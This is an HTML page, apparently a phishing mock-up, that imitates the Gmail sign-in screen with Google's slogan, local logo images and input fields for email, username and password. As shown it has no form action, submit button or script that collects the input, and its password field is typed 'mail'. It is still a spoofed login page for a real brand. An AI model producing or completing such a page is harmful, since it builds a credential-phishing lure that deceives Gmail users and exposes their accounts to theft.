<html>
    <head>
        
        <!-- Bootstrap and jQuery -->
        <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>

        <!-- Sweet Alert -->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/8.11.8/sweetalert2.min.js"></script>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/8.11.8/sweetalert2.min.css">

        <link href='https://fonts.googleapis.com/css?family=Open+Sans+Condensed:300' rel='stylesheet' type='text/css'>
        <link href='https://fonts.googleapis.com/css?family=Open+Sans:300' rel='stylesheet' type='text/css'>
        <title>Gmail login</title>

        <style>

            p,
            h1,
            h4{
                color: #555557;
                font-family: 'open-sans', 'sans-serif';
            }

            .form-input{
                border: solid 1px   #c2c4c6;
                font-size: 16px;
                padding: 0.2em;
            }

            .submit-btn{
                background: #498af2;
                font-family: 'open-sans';
                font-size: 14px;
                color:white;
                border-radius: 5px, 5px, 5px, 5px;
                border-width: 1px;
                border-style: solid;
                border-color: grey;
                cursor: pointer;
                outline: none;
                width: 90%;
                height: 3em;
            }

        </style>

    </head>

    <body>
        <div>
            <div class="row">
                <div class="col">

                    <div class="col-sm-12  col-md-12 col-lg-12 p-3  text-center">
                        <img src="/static/logo.png" width="118" height="38"/>

                    </div>

                    <div class="col-sm-12 col-md-12 col-lg-12 text-center">
                        <h1>One account. All of google.</h1>
                    </div>   
                    
                    <div class="col-sm-12 col-md-12 col-lg-12 text-center">
                        <h4>Signin to continue to gmail</h4>
                    </div>

                    <div class="col-sm-12 col-md-4 col-lg-4">
                        <div class="col-sm-12 col-md-4 col-lg-4 pl-5 pr-5 mt-5"></div>
                    </div>

                    <div class="col-sm-12 col-md-12 col-lg-12 text-center">
                        <img src="/static/footer-logo.png" id="logo2"/>
                    </div>

                    <div class="col-sm-12 col-md-12 col-lg-12 text-center">
                        <img src="/static/profile-img.png" width="99" height="99">
                    </div>

                    <div class="col-sm-12 col-md-12 col-lg-12 text-center">
                        <input placeholder="email" class="form-input" type="mail">
                    </div>

                    <div class="col-sm-12 col-md-12 col-lg-12 text-center">
                        <input placeholder="username" class="form-input" type="mail">
                    </div>

                    <div class="col-sm-12 col-md-12 col-lg-12 text-center">
                        <input placeholder="password" class="form-input" type="mail">
                    </div>
                </div>
            </div>
        </div>
    </body>
</html>